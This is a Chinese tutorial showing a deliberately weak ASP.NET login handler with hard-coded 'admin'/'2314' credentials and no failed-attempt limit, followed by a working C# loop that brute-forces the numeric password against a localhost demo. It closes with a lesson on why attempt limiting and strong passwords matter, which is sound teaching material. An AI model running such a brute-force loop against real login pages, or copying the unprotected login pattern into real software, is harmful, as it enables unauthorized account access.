首先写出一段登录程序:
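// ---- AddCalation.ashx (handler side) ----
<%@ WebHandler Language="C#" Class="AddCalation" %>
using System;
using System.Web;

/// <summary>
/// Demo login handler: compares the submitted username/password with a fixed pair,
/// writes a success or failure message, then renders AddCalation.html with the
/// submitted username filled back into the form.
/// </summary>
/// <remarks>
/// Teaching code, not a production login. The credentials are hard-coded and compared
/// in plain text, and nothing counts or delays failed attempts, so the short numeric
/// password can be found by simply trying every value in turn. A real login needs
/// per-account / per-client attempt limiting, salted password hashes and a stronger
/// password policy.
/// </remarks>
public class AddCalation : IHttpHandler
{
    /// <summary>Handles one request: optional credential check, then form rendering.</summary>
    /// <param name="context">The current HTTP context (request, response, server utilities).</param>
    public void ProcessRequest(HttpContext context)
    {
        context.Response.ContentType = "text/html";

        // Request[...] searches the query string, the form body, cookies and server
        // variables, so the fields are accepted from a GET URL as well as from a POST.
        string ispostback = context.Request["isback"];
        string username = context.Request["username"];
        string password = context.Request["password"];

        if (ispostback == "yes")
        {
            // NOTE(review): hard-coded demo credentials in source; no lockout, delay or
            // CAPTCHA after a failure, which is the weakness this page demonstrates.
            if (username == "admin" && password == "2314")
            {
                context.Response.Write("登陆成功");
            }
            else
            {
                context.Response.Write("登陆失败");
            }
        }
        else
        {
            // First visit: render an empty form.
            username = string.Empty;
        }

        string path = context.Server.MapPath("AddCalation.html");
        string content = System.IO.File.ReadAllText(path);

        // The username is attacker-controlled and lands inside value="...": encode it
        // for an HTML attribute so it cannot close the attribute and inject markup.
        content = content.Replace("@user", HttpUtility.HtmlAttributeEncode(username ?? string.Empty));

        // Never send the submitted password back in the response; blank any @pass
        // placeholder that a template may still contain.
        content = content.Replace("@pass", string.Empty);

        context.Response.Write(content);
    }

    /// <summary>A new handler instance is created for every request.</summary>
    public bool IsReusable
    {
        get { return false; }
    }
}

// ---- AddCalation.html (template side) ----
<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
    <title>加法计算器</title>
</head>
<body>
    <!-- method="post" keeps the credentials out of the URL (browser history, proxy and server logs). -->
    <form action="AddCalation.ashx" method="post">
        <input type="hidden" value="yes" name="isback" />
        <label for="user">用户名</label>
        <input type="text" id="user" value="@user" name="username" />
        <br />
        <label for="pass">密码</label>
        <!-- No value attribute: the password is never pre-filled from the previous submission. -->
        <input type="password" id="pass" name="password" />
        <br /><input type="submit" value="登陆" />
    </form>
</body>
</html>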
然后写一段C#控制台程序进行暴力破解
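using System;
using System.Collections.Generic;
using System.Linq;
using System.Net;
using System.Text;
using System.Threading.Tasks;


namespace PasswordBreak
{
    class Program
    {
        /// <summary>
        /// Exercises the local AddCalation.ashx demo handler (localhost:41566) by submitting
        /// the numbers 0..4999 one after another as the password for "admin", stopping at the
        /// first response that contains the success message. Prints the matching number (if
        /// any) and then the last response body received.
        /// </summary>
        /// <remarks>
        /// Every guess is a separate GET with the candidate in the query string. A handler
        /// that counted failures per account or per client would see a long run of consecutive
        /// failures for the same username here; the demo handler has no such check, which is
        /// why the loop succeeds.
        /// </remarks>
        static void Main(string[] args)
        {
            string s = "";

            // WebClient is IDisposable; the using block releases it once the loop is done.
            using (WebClient wc = new WebClient())
            {
                wc.Encoding = Encoding.UTF8; // the handler's messages are non-ASCII text

                for (int i = 0; i < 5000; i++)
                {
                    s = wc.DownloadString("http://localhost:41566/AddCalation.ashx?isback=yes&username=admin&password=" + i);
                    if (s.Contains("登陆成功"))
                    {
                        Console.WriteLine(i);
                        break;
                    }
                }
            }

            Console.WriteLine();
            Console.Write(s);   // last response body: the success page, or the final failure if nothing matched
            Console.ReadKey();  // keep the console window open
        }
    }
}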
通过循环依次尝试密码,破解自己所写登录代码中的密码。
所以说登录入口的安全性非常重要:上面的登录代码对失败次数没有任何限制,密码又只是很短的纯数字,因此逐个尝试就能试出来;实际系统至少应当限制连续失败的尝试次数,并避免使用这样的弱密码。